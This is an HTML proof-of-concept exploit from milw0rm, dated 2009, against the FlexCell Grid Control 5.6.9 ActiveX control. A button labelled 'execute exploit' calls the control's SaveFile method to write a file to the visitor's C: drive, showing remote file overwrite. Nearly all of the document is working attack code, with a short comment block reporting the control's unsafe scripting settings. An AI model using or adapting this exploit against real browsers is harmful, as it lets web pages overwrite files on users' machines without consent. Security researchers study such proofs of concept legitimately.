37 lines
No EOL
762 B
HTML
37 lines
No EOL
762 B
HTML
<HTML>
|
|
<BODY>
|
|
|
|
<b>
|
|
Author : Houssamix <br/> <br/> <br/>
|
|
|
|
FlexCell Grid Control 5.6.9 Remote File Overwrite Exploit <br/>
|
|
|
|
ExportToXML() is vuln to <br/>
|
|
|
|
<b/>
|
|
|
|
|
|
<object id=hsmx classid="clsid:{2A7D9CCE-211A-4654-9449-718F71ED9644}"></object>
|
|
|
|
<SCRIPT>
|
|
/*
|
|
Report for Clsid: {2A7D9CCE-211A-4654-9449-718F71ED9644}
|
|
RegKey Safe for Script: Faux
|
|
RegKey Safe for Init: Faux
|
|
Implements IObjectSafety: Vrai
|
|
IDisp Safe: Safe for untrusted: caller,data
|
|
IPersist Safe: Safe for untrusted: caller,data
|
|
IPStorage Safe: Safe for untrusted: caller,data
|
|
*/
|
|
function hehe()
|
|
{
|
|
File = "c:\\hsmx.txt"
|
|
hsmx.SaveFile(File)
|
|
}
|
|
|
|
</SCRIPT>
|
|
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
|
|
</body>
|
|
</HTML>
|
|
|
|
# milw0rm.com [2009-01-26] |